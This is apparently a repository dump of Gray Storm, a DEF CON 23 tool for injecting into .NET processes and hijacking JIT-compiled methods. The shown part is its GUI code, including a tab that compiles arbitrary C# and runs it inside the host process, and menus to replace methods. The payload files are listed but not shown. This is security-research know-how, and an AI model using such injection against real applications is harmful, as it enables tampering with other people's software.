├── .gitignore
├── CHANGELOG.txt
├── GUI
├── GrayStorm.Designer.cs
├── GrayStorm.cs
├── GrayStorm.resx
├── MethodEditor.Designer.cs
├── MethodEditor.cs
├── MethodEditor.resx
├── cSharpMethodWriter.Designer.cs
├── cSharpMethodWriter.cs
├── cSharpMethodWriter.resx
├── hierarchyViewer.Designer.cs
├── hierarchyViewer.cs
├── hierarchyViewer.resx
├── memoryHijacker.Designer.cs
├── memoryHijacker.cs
├── memoryHijacker.resx
├── shellcode.Designer.cs
├── shellcode.cs
└── shellcode.resx
├── GrayStorm.csproj
├── GrayStorm.sln
├── IL Disasm
├── ByteArrayExtensions.cs
├── ILCode.cs
├── ILInstruction.cs
├── ILOpCodeTranslator.cs
└── formatOutput.cs
├── LICENSE
├── Program.cs
├── README.md
├── assemblyHelpers
├── assemblyHelpers.cs
└── signatures.cs
├── beaEngine
├── Constants.cs
├── Disassemble.cs
├── Engine.cs
└── Structs.cs
├── dynamicC
├── dynamicMethodGenerators.cs
├── methodReplacer.cs
└── userCreatedMethods.cs
├── memoryHijacking
├── StorageInformation.cs
├── assemblyControlFlow.cs
├── domainTraverser.cs
├── methodHelpers.cs
├── methodHijacking.cs
└── methodInvoking.cs
├── objectHunter
├── foundObject.cs
└── heapObjects.cs
├── shellcodes
├── CToAsmAttackChain.cs
├── dataBox.cs
└── payloads.cs
└── testClass.cs
/.gitignore:
--------------------------------------------------------------------------------
1 | # Directories
2 | *[Dd]ebug/
3 | *[Dd]ebugPublic/
4 | *[Rr]elease/
5 | *[Rr]eleases/
6 | *x64/
7 | *x86/
8 | *build/
9 | *bld/
10 | *[Bb]in/
11 | *[Oo]bj/
12 |
13 | #FILES
14 | *.exe
15 | *.config
16 | *.pdb
17 | *.manifest
18 | *.Cache
19 | *.suo
20 | *.swp
21 | *.sdf
22 |
23 | # MSTest test Results
24 | [Tt]est[Rr]esult*/
25 | [Bb]uild[Ll]og.*
26 |
27 | # User-specific files
28 | *.suo
29 | *.user
30 | *.userosscache
31 | *.sln.docstates
--------------------------------------------------------------------------------
/CHANGELOG.txt:
--------------------------------------------------------------------------------
1 | Changelog
2 |
3 | 08.05.2015 GrayStorm-1.0
4 |
5 | * Initial release of Gray Storm for DEF CON 23
6 | * Hunt objects from the Managed Heap
7 | * Attack the .NET JIT
8 | * Rewrite a Method's raw ASM
9 | * View IL of a Method
10 | * Dump ASM from a Method
11 | * Disassemble a Method's ASM using BeaEngine
12 |
13 |
--------------------------------------------------------------------------------
/GUI/GrayStorm.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 |
10 | namespace GrayStorm
11 | {
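/// <summary>
/// Main window of the tool. The constructor publishes several designer-created
/// controls through static fields so the other tabs (hierarchy viewer, shellcode,
/// memory hijacker) can write to them directly.
/// </summary>
public partial class grayStorm : Form
{
    // Handles to designer controls, assigned once in the constructor and read by the other tabs.
    public static TextBox _methodLabel_TB;
    public static TextBox _constructorLabel_TB;
    public static TextBox _addrOfMethod_TB;
    public static TextBox _addrOfConstructor_TB;
    hierarchyViewer _hierarchyViewer;
    shellcode _shellcode;
    public static memoryHijacker _memoryHijacker;

    /// <summary>
    /// Builds the form, wires the static control references and initialises the
    /// hierarchy viewer and shellcode tabs.
    /// </summary>
    public grayStorm()
    {
        InitializeComponent();

        _hierarchyViewer = hierarchyViewer1;
        _hierarchyViewer.loadhierarchyViewer();

        _shellcode = shellcodeTAB;
        _shellcode.loadShellcode();

        _memoryHijacker = memoryHijacker1;

        _methodLabel_TB = selectedMethod_TB;
        _constructorLabel_TB = selectedConstructor_TB;

        _addrOfMethod_TB = addrOfMethod_TB;
        _addrOfConstructor_TB = addrOfConstructor_TB;

        // Use the numeric major version instead of the first character of the
        // version string, so a multi-digit major is reported correctly.
        this.Text = "Gray Storm: Injected into CLR version " + Environment.Version.Major;
    }
}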
45 | }
46 |
--------------------------------------------------------------------------------
/GUI/MethodEditor.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 17, 17
122 |
123 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
/// <summary>
/// Designer-generated half of the C# method writer tab: control creation, layout
/// and event wiring. Regenerated by the Windows Forms designer; edit the other
/// partial file for behaviour.
/// </summary>
partial class cSharpMethodWriter
{
    /// <summary>
    /// Required designer variable.
    /// </summary>
    private System.ComponentModel.IContainer components = null;

    /// <summary>
    /// Clean up any resources being used.
    /// </summary>
    /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
    protected override void Dispose(bool disposing)
    {
        if (disposing && (components != null))
        {
            components.Dispose();
        }
        base.Dispose(disposing);
    }

    #region Component Designer generated code

    /// <summary>
    /// Required method for Designer support - do not modify
    /// the contents of this method with the code editor.
    /// </summary>
    private void InitializeComponent()
    {
        this.cSharpCode_RTB = new System.Windows.Forms.RichTextBox();
        this.label1 = new System.Windows.Forms.Label();
        this.method_TB = new System.Windows.Forms.TextBox();
        this.class_TB = new System.Windows.Forms.TextBox();
        this.nameSpace_TB = new System.Windows.Forms.TextBox();
        this.testMethod = new System.Windows.Forms.CheckBox();
        this.addDll_Butt = new System.Windows.Forms.Button();
        this.compile_Butt = new System.Windows.Forms.Button();
        this.errs_RTB = new System.Windows.Forms.RichTextBox();
        this.SuspendLayout();
        //
        // cSharpCode_RTB (source editor)
        //
        this.cSharpCode_RTB.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
        | System.Windows.Forms.AnchorStyles.Left)
        | System.Windows.Forms.AnchorStyles.Right)));
        this.cSharpCode_RTB.BackColor = System.Drawing.SystemColors.InactiveCaption;
        this.cSharpCode_RTB.Location = new System.Drawing.Point(0, 0);
        this.cSharpCode_RTB.Name = "cSharpCode_RTB";
        this.cSharpCode_RTB.Size = new System.Drawing.Size(508, 217);
        this.cSharpCode_RTB.TabIndex = 9;
        this.cSharpCode_RTB.Text = "";
        //
        // label1
        //
        this.label1.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
        this.label1.AutoSize = true;
        this.label1.Location = new System.Drawing.Point(175, 252);
        this.label1.Name = "label1";
        this.label1.Size = new System.Drawing.Size(547, 13);
        this.label1.TabIndex = 14;
        this.label1.Text = "Input the namespace, class for the above. Also if testing a method input a single" +
        " method from the dynamic c# code";
        //
        // method_TB (name of the method to test-invoke)
        //
        this.method_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
        this.method_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
        this.method_TB.Location = new System.Drawing.Point(3, 275);
        this.method_TB.Name = "method_TB";
        this.method_TB.Size = new System.Drawing.Size(166, 20);
        this.method_TB.TabIndex = 13;
        this.method_TB.Text = "Method";
        //
        // class_TB
        //
        this.class_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
        this.class_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
        this.class_TB.Location = new System.Drawing.Point(3, 249);
        this.class_TB.Name = "class_TB";
        this.class_TB.Size = new System.Drawing.Size(166, 20);
        this.class_TB.TabIndex = 12;
        this.class_TB.Text = "Class";
        //
        // nameSpace_TB
        //
        this.nameSpace_TB.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
        this.nameSpace_TB.BackColor = System.Drawing.SystemColors.InactiveCaption;
        this.nameSpace_TB.Location = new System.Drawing.Point(6, 223);
        this.nameSpace_TB.Name = "nameSpace_TB";
        this.nameSpace_TB.Size = new System.Drawing.Size(163, 20);
        this.nameSpace_TB.TabIndex = 11;
        this.nameSpace_TB.Text = "Namespace";
        //
        // testMethod (checkbox: invoke the named method right after compiling)
        //
        this.testMethod.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Left)));
        this.testMethod.AutoSize = true;
        this.testMethod.Location = new System.Drawing.Point(6, 308);
        this.testMethod.Name = "testMethod";
        this.testMethod.Size = new System.Drawing.Size(146, 17);
        this.testMethod.TabIndex = 18;
        this.testMethod.Text = "test method after creation";
        this.testMethod.UseVisualStyleBackColor = true;
        //
        // addDll_Butt
        //
        this.addDll_Butt.Dock = System.Windows.Forms.DockStyle.Bottom;
        this.addDll_Butt.Location = new System.Drawing.Point(0, 331);
        this.addDll_Butt.Name = "addDll_Butt";
        this.addDll_Butt.Size = new System.Drawing.Size(511, 24);
        this.addDll_Butt.TabIndex = 17;
        this.addDll_Butt.Text = "Add Dlls";
        this.addDll_Butt.UseVisualStyleBackColor = true;
        this.addDll_Butt.Click += new System.EventHandler(this.addDll_Butt_Click);
        //
        // compile_Butt
        //
        this.compile_Butt.Dock = System.Windows.Forms.DockStyle.Bottom;
        this.compile_Butt.Location = new System.Drawing.Point(0, 355);
        this.compile_Butt.Name = "compile_Butt";
        this.compile_Butt.Size = new System.Drawing.Size(511, 25);
        this.compile_Butt.TabIndex = 16;
        this.compile_Butt.Text = "Compile";
        this.compile_Butt.UseVisualStyleBackColor = true;
        this.compile_Butt.Click += new System.EventHandler(this.compile_Butt_Click);
        //
        // errs_RTB (compiler/diagnostic output)
        //
        this.errs_RTB.BackColor = System.Drawing.SystemColors.InactiveCaption;
        this.errs_RTB.Dock = System.Windows.Forms.DockStyle.Bottom;
        this.errs_RTB.Location = new System.Drawing.Point(0, 380);
        this.errs_RTB.Name = "errs_RTB";
        this.errs_RTB.RightToLeft = System.Windows.Forms.RightToLeft.No;
        this.errs_RTB.Size = new System.Drawing.Size(511, 54);
        this.errs_RTB.TabIndex = 15;
        this.errs_RTB.Text = "";
        //
        // cSharpMethodWriter
        //
        this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
        this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
        this.Controls.Add(this.testMethod);
        this.Controls.Add(this.addDll_Butt);
        this.Controls.Add(this.compile_Butt);
        this.Controls.Add(this.errs_RTB);
        this.Controls.Add(this.label1);
        this.Controls.Add(this.method_TB);
        this.Controls.Add(this.class_TB);
        this.Controls.Add(this.nameSpace_TB);
        this.Controls.Add(this.cSharpCode_RTB);
        this.Name = "cSharpMethodWriter";
        this.Size = new System.Drawing.Size(511, 434);
        this.ResumeLayout(false);
        this.PerformLayout();

    }

    #endregion

    // Designer-managed control fields; referenced by the other partial file.
    private System.Windows.Forms.RichTextBox cSharpCode_RTB;
    private System.Windows.Forms.Label label1;
    private System.Windows.Forms.TextBox method_TB;
    private System.Windows.Forms.TextBox class_TB;
    private System.Windows.Forms.TextBox nameSpace_TB;
    private System.Windows.Forms.CheckBox testMethod;
    private System.Windows.Forms.Button addDll_Butt;
    private System.Windows.Forms.Button compile_Butt;
    private System.Windows.Forms.RichTextBox errs_RTB;

}
172 | }
173 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.CSharp;
2 | using System;
3 | using System.CodeDom.Compiler;
4 | using System.Collections.Generic;
5 | using System.ComponentModel;
6 | using System.Data;
7 | using System.Drawing;
8 | using System.Linq;
9 | using System.Reflection;
10 | using System.Text;
11 | using System.Windows.Forms;
12 |
13 | namespace GrayStorm
14 | {
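/// <summary>
/// Tab that compiles the C# source typed into the editor with CodeDOM and registers
/// the resulting methods in <c>dynamicC.userCreatedMethods.userCreatedMethodsList</c>.
/// Anything compiled here is loaded and, when the test box is ticked, executed inside
/// this process, with this process's privileges.
/// </summary>
public partial class cSharpMethodWriter : UserControl
{
    // Reflection flags used both to look up the test method and to enumerate the
    // methods that get registered; identical to the original two call sites.
    private const BindingFlags memberFlags =
        BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.Public | BindingFlags.DeclaredOnly;

    // Assembly paths picked through the "Add Dlls" button; passed to the compiler in
    // addition to every assembly already loaded in the current AppDomain.
    private List<string> assemblyReferences = new List<string>();

    /// <summary>
    /// Initialises the controls and seeds the editor with a minimal namespace/class skeleton
    /// whose names match the namespace and class text boxes.
    /// </summary>
    public cSharpMethodWriter()
    {
        InitializeComponent();
        cSharpCode_RTB.Text = "using System; \n namespace customCSharp \n { \t\n class customClass \t\n { \t\n } \n }";
        nameSpace_TB.Text = "customCSharp";
        class_TB.Text = "customClass";
    }

    //TODO FIX METHODS APPEARING MORE THAN ONCE IN LISTING
    // (probably because every compile appends the whole method set again — verify against the list's other users)
    /// <summary>
    /// Compiles the editor contents in memory, reports compiler errors, optionally
    /// test-invokes the method named in <c>method_TB</c>, then registers every method
    /// declared on the named class and refreshes the memory hijacker's list box.
    /// </summary>
    private void compile_Butt_Click(object sender, EventArgs e)
    {
        errs_RTB.Clear();

        CompilerResults results;
        // CSharpCodeProvider is a Component; dispose it once the compile is done.
        using (CSharpCodeProvider provider = new CSharpCodeProvider())
        {
            CompilerParameters parameters = new CompilerParameters();
            parameters.GenerateInMemory = true;
            addReferences(parameters);
            results = provider.CompileAssemblyFromSource(parameters, cSharpCode_RTB.Text);
        }

        if (results.Errors.HasErrors)
        {
            foreach (CompilerError error in results.Errors)
            {
                errs_RTB.AppendText(String.Format("Error Line {0} -> ({1}): {2}\n", error.Line, error.ErrorNumber, error.ErrorText));
            }
            return;
        }

        Type binaryFunction = results.CompiledAssembly.GetType(nameSpace_TB.Text + "." + class_TB.Text);
        if (binaryFunction == null)
        {
            errs_RTB.AppendText("Adding Methods failed... no existing namespace and class");
            return;
        }

        // A failed test run leaves the list untouched, as before (the exception used to escape instead).
        if (testMethod.Checked && !testInvoke(binaryFunction))
            return;

        foreach (MethodInfo method in binaryFunction.GetMethods(memberFlags))
            dynamicC.userCreatedMethods.userCreatedMethodsList.Add(method);

        errs_RTB.AppendText("Methods added to userCreatedMethodsList.\n");
        grayStorm._memoryHijacker.dynamicMethods_LB.Items.Clear();
        grayStorm._memoryHijacker.dynamicMethods_LB.Items.AddRange(dynamicC.userCreatedMethods.userCreatedMethodsList.ToArray());
        grayStorm._memoryHijacker.dynamicMethods_LB.Refresh();
    }

    /// <summary>
    /// Adds the user-chosen DLLs plus every loaded, non-dynamic assembly of the current
    /// AppDomain as compiler references, skipping paths already added so the compiler
    /// is not handed the same reference twice.
    /// </summary>
    private void addReferences(CompilerParameters parameters)
    {
        HashSet<string> seen = new HashSet<string>(StringComparer.OrdinalIgnoreCase);

        foreach (string refAsm in assemblyReferences)
        {
            if (seen.Add(refAsm))
                parameters.ReferencedAssemblies.Add(refAsm);
        }

        foreach (Assembly assembly in AppDomain.CurrentDomain.GetAssemblies())
        {
            string location;
            try
            {
                location = assembly.Location;
            }
            catch (NotSupportedException)
            {
                // this happens for dynamic assemblies, so just ignore it.
                continue;
            }
            if (!String.IsNullOrEmpty(location) && seen.Add(location))
            {
                parameters.ReferencedAssemblies.Add(location);
            }
        }
    }

    /// <summary>
    /// Looks up the method named in <c>method_TB</c> on <paramref name="compiledType"/> and
    /// invokes it once with no instance and no arguments. Failures are written to
    /// <c>errs_RTB</c> instead of escaping the UI event handler, since an unhandled
    /// exception here would surface in the process this control is hosted in.
    /// </summary>
    /// <returns>true when the call completed; false when the method was missing or the call failed.</returns>
    private bool testInvoke(Type compiledType)
    {
        MethodInfo compiledCSharp;
        try
        {
            compiledCSharp = compiledType.GetMethod(method_TB.Text, memberFlags);
        }
        catch (AmbiguousMatchException)
        {
            errs_RTB.AppendText("Method name is overloaded; give the test method a unique name\n");
            return false;
        }

        if (compiledCSharp == null)
        {
            errs_RTB.AppendText("Method does not exist");
            return false;
        }

        try
        {
            // Same call shape as before: null instance, no arguments.
            compiledCSharp.Invoke(null, new object[] { });
            return true;
        }
        catch (TargetInvocationException ex)
        {
            // The compiled method itself threw.
            Exception inner = ex.InnerException ?? ex;
            errs_RTB.AppendText(String.Format("Test method threw {0}: {1}\n", inner.GetType().Name, inner.Message));
            return false;
        }
        catch (TargetException)
        {
            errs_RTB.AppendText("Test method is an instance method; only static methods can be test-invoked\n");
            return false;
        }
        catch (TargetParameterCountException)
        {
            errs_RTB.AppendText("Test method expects arguments; only parameterless methods can be test-invoked\n");
            return false;
        }
    }

    /// <summary>
    /// Lets the user pick one or more DLLs to reference on the next compile. Only records
    /// paths when the dialog was confirmed (a cancelled dialog used to add the empty
    /// FileName) and honours Multiselect by taking every chosen file.
    /// </summary>
    private void addDll_Butt_Click(object sender, EventArgs e)
    {
        using (OpenFileDialog file = new OpenFileDialog())
        {
            file.Multiselect = true;
            file.Filter = "dll files (*.dll)|*.dll";
            file.Title = "Select a dll/exe code base";
            if (file.ShowDialog() != DialogResult.OK)
                return;

            foreach (string path in file.FileNames)
            {
                if (!assemblyReferences.Contains(path))
                    assemblyReferences.Add(path);
            }
        }
    }
}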
106 | }
107 |
--------------------------------------------------------------------------------
/GUI/cSharpMethodWriter.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
/// <summary>
/// Designer-generated half of the hierarchy viewer tab: the assembly tree, its
/// right-click menu and the "Refresh Domain" button. Regenerated by the Windows
/// Forms designer; behaviour lives in the other partial file.
/// </summary>
partial class hierarchyViewer
{
    /// <summary>
    /// Required designer variable.
    /// </summary>
    private System.ComponentModel.IContainer components = null;

    /// <summary>
    /// Clean up any resources being used.
    /// </summary>
    /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
    protected override void Dispose(bool disposing)
    {
        if (disposing && (components != null))
        {
            components.Dispose();
        }
        base.Dispose(disposing);
    }

    #region Component Designer generated code

    /// <summary>
    /// Required method for Designer support - do not modify
    /// the contents of this method with the code editor.
    /// </summary>
    private void InitializeComponent()
    {
        this.components = new System.ComponentModel.Container();
        this.hierarchyViewer_TN = new System.Windows.Forms.TreeView();
        this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
        this.dumpAssemblyToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.dumpToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.disassembleToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.reDumpToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.fireMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.normalToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.withINT3ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.restoreMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.showILCodeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.replaceMethodWithCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.cacheReplacerMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.refreshDomain_BT = new System.Windows.Forms.Button();
        this.panel1 = new System.Windows.Forms.Panel();
        this.contextMenuStrip1.SuspendLayout();
        this.panel1.SuspendLayout();
        this.SuspendLayout();
        //
        // hierarchyViewer_TN (assembly / type / member tree)
        //
        this.hierarchyViewer_TN.ContextMenuStrip = this.contextMenuStrip1;
        this.hierarchyViewer_TN.Dock = System.Windows.Forms.DockStyle.Fill;
        this.hierarchyViewer_TN.Location = new System.Drawing.Point(0, 25);
        this.hierarchyViewer_TN.Name = "hierarchyViewer_TN";
        this.hierarchyViewer_TN.Size = new System.Drawing.Size(291, 204);
        this.hierarchyViewer_TN.TabIndex = 0;
        this.hierarchyViewer_TN.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.hierarchyViewer_TN_AfterSelect);
        //
        // contextMenuStrip1 (right-click menu on the tree)
        //
        this.contextMenuStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
        this.dumpAssemblyToolStripMenuItem,
        this.fireMethodToolStripMenuItem,
        this.restoreMethodToolStripMenuItem,
        this.showILCodeToolStripMenuItem,
        this.replaceMethodWithCustomCToolStripMenuItem,
        this.cacheReplacerMethodToolStripMenuItem});
        this.contextMenuStrip1.Name = "contextMenuStrip1";
        this.contextMenuStrip1.Size = new System.Drawing.Size(252, 136);
        //
        // dumpAssemblyToolStripMenuItem
        //
        this.dumpAssemblyToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
        this.dumpToolStripMenuItem,
        this.disassembleToolStripMenuItem,
        this.reDumpToolStripMenuItem});
        this.dumpAssemblyToolStripMenuItem.Name = "dumpAssemblyToolStripMenuItem";
        this.dumpAssemblyToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.dumpAssemblyToolStripMenuItem.Text = "Dump Assembly";
        //
        // dumpToolStripMenuItem
        //
        this.dumpToolStripMenuItem.Name = "dumpToolStripMenuItem";
        this.dumpToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
        this.dumpToolStripMenuItem.Text = "Dump";
        this.dumpToolStripMenuItem.Click += new System.EventHandler(this.dumpToolStripMenuItem_Click);
        //
        // disassembleToolStripMenuItem
        //
        this.disassembleToolStripMenuItem.Name = "disassembleToolStripMenuItem";
        this.disassembleToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
        this.disassembleToolStripMenuItem.Text = "Disassemble";
        this.disassembleToolStripMenuItem.Click += new System.EventHandler(this.disassembleToolStripMenuItem_Click);
        //
        // reDumpToolStripMenuItem
        //
        this.reDumpToolStripMenuItem.Name = "reDumpToolStripMenuItem";
        this.reDumpToolStripMenuItem.Size = new System.Drawing.Size(139, 22);
        this.reDumpToolStripMenuItem.Text = "ReDump";
        this.reDumpToolStripMenuItem.Click += new System.EventHandler(this.reDumpToolStripMenuItem_Click);
        //
        // fireMethodToolStripMenuItem
        //
        this.fireMethodToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
        this.normalToolStripMenuItem,
        this.withINT3ToolStripMenuItem});
        this.fireMethodToolStripMenuItem.Name = "fireMethodToolStripMenuItem";
        this.fireMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.fireMethodToolStripMenuItem.Text = "Fire Method";
        //
        // normalToolStripMenuItem
        //
        this.normalToolStripMenuItem.Name = "normalToolStripMenuItem";
        this.normalToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
        this.normalToolStripMenuItem.Text = "Normal";
        this.normalToolStripMenuItem.Click += new System.EventHandler(this.normalToolStripMenuItem_Click);
        //
        // withINT3ToolStripMenuItem
        //
        this.withINT3ToolStripMenuItem.Name = "withINT3ToolStripMenuItem";
        this.withINT3ToolStripMenuItem.Size = new System.Drawing.Size(130, 22);
        this.withINT3ToolStripMenuItem.Text = "With INT 3";
        this.withINT3ToolStripMenuItem.Click += new System.EventHandler(this.withINT3ToolStripMenuItem_Click);
        //
        // restoreMethodToolStripMenuItem
        //
        this.restoreMethodToolStripMenuItem.Name = "restoreMethodToolStripMenuItem";
        this.restoreMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.restoreMethodToolStripMenuItem.Text = "Restore Method";
        this.restoreMethodToolStripMenuItem.Click += new System.EventHandler(this.restoreMethodToolStripMenuItem_Click);
        //
        // showILCodeToolStripMenuItem
        //
        this.showILCodeToolStripMenuItem.Name = "showILCodeToolStripMenuItem";
        this.showILCodeToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.showILCodeToolStripMenuItem.Text = "Show IL Code";
        this.showILCodeToolStripMenuItem.Click += new System.EventHandler(this.showILCodeToolStripMenuItem_Click);
        //
        // replaceMethodWithCustomCToolStripMenuItem
        //
        this.replaceMethodWithCustomCToolStripMenuItem.Name = "replaceMethodWithCustomCToolStripMenuItem";
        this.replaceMethodWithCustomCToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.replaceMethodWithCustomCToolStripMenuItem.Text = "Replace Method With Custom C#";
        this.replaceMethodWithCustomCToolStripMenuItem.Click += new System.EventHandler(this.replaceMethodWithCustomCToolStripMenuItem_Click);
        //
        // cacheReplacerMethodToolStripMenuItem
        //
        this.cacheReplacerMethodToolStripMenuItem.Name = "cacheReplacerMethodToolStripMenuItem";
        this.cacheReplacerMethodToolStripMenuItem.Size = new System.Drawing.Size(251, 22);
        this.cacheReplacerMethodToolStripMenuItem.Text = "Cache Replacer Method";
        this.cacheReplacerMethodToolStripMenuItem.Click += new System.EventHandler(this.cacheReplacerMethodToolStripMenuItem_Click);
        //
        // refreshDomain_BT
        //
        this.refreshDomain_BT.Dock = System.Windows.Forms.DockStyle.Top;
        this.refreshDomain_BT.Location = new System.Drawing.Point(0, 0);
        this.refreshDomain_BT.Name = "refreshDomain_BT";
        this.refreshDomain_BT.Size = new System.Drawing.Size(291, 25);
        this.refreshDomain_BT.TabIndex = 0;
        this.refreshDomain_BT.Text = "Refresh Domain";
        this.refreshDomain_BT.UseVisualStyleBackColor = true;
        this.refreshDomain_BT.Click += new System.EventHandler(this.refreshDomain_BT_Click);
        //
        // panel1
        //
        this.panel1.Controls.Add(this.hierarchyViewer_TN);
        this.panel1.Controls.Add(this.refreshDomain_BT);
        this.panel1.Dock = System.Windows.Forms.DockStyle.Fill;
        this.panel1.Location = new System.Drawing.Point(0, 0);
        this.panel1.Name = "panel1";
        this.panel1.Size = new System.Drawing.Size(291, 229);
        this.panel1.TabIndex = 1;
        //
        // hierarchyViewer
        //
        this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
        this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
        this.Controls.Add(this.panel1);
        this.Name = "hierarchyViewer";
        this.Size = new System.Drawing.Size(291, 229);
        this.contextMenuStrip1.ResumeLayout(false);
        this.panel1.ResumeLayout(false);
        this.ResumeLayout(false);

    }

    #endregion

    // Designer-managed control fields; referenced by the other partial file.
    private System.Windows.Forms.TreeView hierarchyViewer_TN;
    private System.Windows.Forms.Button refreshDomain_BT;
    private System.Windows.Forms.ContextMenuStrip contextMenuStrip1;
    private System.Windows.Forms.ToolStripMenuItem dumpAssemblyToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem dumpToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem disassembleToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem fireMethodToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem normalToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem withINT3ToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem reDumpToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem restoreMethodToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem showILCodeToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem replaceMethodWithCustomCToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem cacheReplacerMethodToolStripMenuItem;
    private System.Windows.Forms.Panel panel1;
}
207 | }
208 |
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
13 | public partial class hierarchyViewer : UserControl
14 | {
15 | #region events
/// <summary>Handler signature for a method being selected in the tree.</summary>
/// <param name="targetMethod">The selected method.</param>
/// <param name="TN">The tree node that represents it.</param>
public delegate void targetMethod(MethodInfo targetMethod, TreeNode TN);
/// <summary>Raised when a method node is selected; wired in loadhierarchyViewer().</summary>
public event targetMethod selectedMethod;

/// <summary>Handler signature for a constructor being selected in the tree.</summary>
/// <param name="targetConstructor">The selected constructor.</param>
/// <param name="TN">The tree node that represents it.</param>
public delegate void targetConstructor(ConstructorInfo targetConstructor, TreeNode TN);
